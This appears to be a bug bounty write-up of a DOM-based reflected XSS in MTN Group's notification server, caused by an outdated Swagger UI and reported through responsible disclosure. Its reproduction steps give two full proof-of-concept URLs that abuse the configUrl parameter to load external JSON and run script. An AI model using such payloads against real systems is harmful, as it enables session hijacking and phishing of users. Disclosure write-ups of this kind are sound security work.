DOM-Based Reflected XSS in MTN Group’s Notification Server | Bug Bounty

 

Introduction

 Cross-Site Scripting (XSS) vulnerabilities remain a prevalent security threat, posing risks to user data and application integrity. In early 2024, security researcher nhx1 uncovered a DOM-Based Reflected XSS vulnerability in MTN Group's notification server, stemming from the use of an outdated version of Swagger. This article explores the discovery, impact, and resolution of this issue.

 Discovery of the Vulnerability

 While examining MTN Group's systems, researchers identified that the notification server was running an older version of Swagger, which had known XSS vulnerabilities. By manipulating the configUrl parameter, they injected a malicious URL to test for a possible exploit.

 Steps to Reproduce

 To demonstrate the vulnerability, the following steps were followed:

1. Access the URL:

https://notification-server-v2.sz-my.mtn.com/index.html?configUrl=https://jumpy-floor.surge.sh/test.json

2. Upon loading, an alert box appeared, confirming the successful execution of the XSS payload.

3. A second payload using a different URL was also tested:

https://notification-server-v2.sz-my.mtn.com/index.html?configUrl=https://xss.smarpo.com/test.json

This also resulted in the execution of arbitrary JavaScript.

 

 Potential Impact

 An attacker leveraging this vulnerability could execute malicious scripts within the context of MTN Group's notification server. The consequences may include:

• Session hijacking
• Data theft
• Phishing attacks targeting MTN Group users
• Potential account takeovers for services under the *.mtn.com domain

 Lessons Learned

 This incident underscores the critical need for keeping third-party libraries updated. Security teams and developers should consider the following best practices:

• Regularly update dependencies to patch known vulnerabilities.
   
• Apply strict input validation and sanitization to prevent malicious data injection.
   
• Conduct regular security assessments to proactively identify and mitigate risks.

 Conclusion

 DOM-Based Reflected XSS vulnerabilities pose significant risks, but proactive security measures can mitigate their impact. Thanks to responsible disclosure by nhx1, MTN Group successfully addressed this issue. Collaborative efforts like these strengthen cybersecurity and protect users from malicious threats.

 Acknowledgment

 Kudos to nhx1 for their diligent research and contribution. Their work serves as an inspiration to the cybersecurity community.

Enjoyed this write-up? Follow me on Medium for more bug bounty stories and cybersecurity insights!